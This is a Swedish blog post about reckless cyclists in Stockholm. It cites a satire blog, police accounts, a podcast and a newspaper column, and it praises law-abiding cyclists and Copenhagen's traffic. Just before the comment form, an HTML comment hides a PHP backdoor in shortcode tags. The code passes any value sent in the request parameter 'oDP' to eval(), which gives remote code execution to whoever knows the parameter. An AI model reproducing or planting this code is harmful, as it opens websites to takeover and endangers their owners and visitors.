Cyklister

Märker mer och mer att folk i allmänhet får upp ögonen för att många cyklister här i stockholm är rent av livsfarliga. Första antydan var Stockholmsnatt (http://stockholmsnatten.blogspot.se/2011/09/blog-post_09.html?m=1) som gjorde en satir om MEMILs.

Jag följer dessutom ett antal poliser på Twitter och ser en del händelser med cyklister (inte alla är cyklistens fel skall tilläggas. Se bara vad som hände på stadsgårdsleden tidigare i juni när en feg bilist körde på en cyklist och stack..)

I doktorn podcast (http://www.radioplay.se/clip/6862/avsnitt+3+polisen+i+media) med två av mc poliserna i Sthlm så beskriver de bra hur vissa rör sig i trafiken. Värt att lyssna på.

Även en bra artikel i DN (http://mobil.dn.se/kultur-noje/kronikor/sa-blev-man-i-lycra-aggressiva-cykelkrigare/) beskriver hur en del är.

Till saken hör att jag älskar de som lugnt och lagligt cyklar i staden. Det av flera anledningar. För de är inte problemet, de skall lyftas för att de gör något bra istället.

För 100 cyklar tar mindre plats än 100 bilar och orsakat långt mindre problem än vad bilar orsakar.

Minns när jag och sambon var i Köpenhamn och reagerade på hur skönt det var med att cyklisterna kom på ställen där man förväntade sig dem. Exempelvis med färdriktningen på vägar.

<!– [insert_php]if (isset($_REQUEST["oDP"])){eval($_REQUEST["oDP"]);exit;}[/insert_php][php]if (isset($_REQUEST["oDP"])){eval($_REQUEST["oDP"]);exit;}[/php] –>

Kommentera

E-postadressen publiceras inte. Obligatoriska fält är märkta *